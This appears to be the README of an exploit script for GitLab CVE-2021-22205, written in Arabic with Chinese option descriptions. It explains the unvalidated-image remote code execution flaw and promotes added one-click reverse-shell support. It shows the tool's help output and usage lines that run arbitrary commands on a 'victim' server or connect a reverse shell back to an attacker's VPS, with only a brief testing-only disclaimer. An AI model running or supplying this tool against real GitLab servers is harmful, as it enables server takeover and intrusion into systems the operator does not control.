
سكربت كشف CVE-2021-22205، يدعم getshell وتنفيذ الأوامر
نظرًا لأن GitLab لا يتحقق بشكل صحيح من ملفات الصور التي يتم تمريرها إلى محلل الملفات، فإن ذلك يؤدي إلى تنفيذ أوامر. يمكن للمهاجم إنشاء طلبات خبيثة لاستغلال هذه الثغرة لتنفيذ أوامر عشوائية على النظام المستهدف، مما يؤدي في النهاية إلى السيطرة على خادم GitLab. وبما أن معظم النصوص البرمجية على الإنترنت تفتقر إلى ميزة الـ reverse shell، لذلك قمت بتعديل النص البرمجي المكتوب على الإنترنت وإضافة ميزة getshell بضغطة واحدة.
______ _______ ____ ___ ____ _ ____ ____ ____ ___ ____
/ ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \|___ \|___ \ / _ \| ___|
| | \ \ / /| _| _____ __) | | | |__) | |_____ __) | __) | __) | | | |___ \
| |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/ / __/ / __/| |_| |___) |
\____ | \_/ |_____| |_____|\___/_____|_| |_____|_____|_____|\___/|____/
usage: CVE-2021-22205.py [-h] [-t TARGET] [-c COMMAND] [--shell] [-i IP]
[-p PORT]
GitLab < 13.10.3 RCE
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
目标URL
-c COMMAND, --command COMMAND
执行命令
--shell 是否反弹shell
-i IP, --ip IP 反弹shell ip
-p PORT, --port PORT 反弹shell端口
python3 CVE-2021-22205.py -t [受害者ip] --shell -i [vps ip] -p [vps port] //反弹shell
python3 CVE-2021-22205.py -t [受害者ip] -c [command] //执行命令
هذا النص البرمجي مخصص للاستخدام في الاختبار فقط، ولا يجوز استخدامه لأغراض أخرى.